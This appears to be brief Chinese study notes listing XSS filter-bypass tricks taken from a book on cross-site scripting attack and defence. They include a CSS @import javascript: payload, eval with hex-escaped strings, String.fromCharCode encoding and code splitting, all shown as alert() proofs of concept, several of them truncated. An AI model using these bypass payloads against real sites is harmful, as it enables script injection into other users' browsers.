代码:
@import “javascript:alert('sss')”;
大小写混淆绕过:
不用空格:
javascript...>eval("alert('xaaa')") 通过eval()函数执行js
eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x78\x78...\x78\x27\x29") 16进制转码后通过eval函数执行
javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,120,122,122,39,41...))"> eval()配合String.fromCharCode()函数执行10进制脚本
代码拆分执行:
z='javascript:'...----
以上都是在《XSS跨站脚本攻击剖析与防御》学习到的绕过方法
没事多看看书,永远不亏!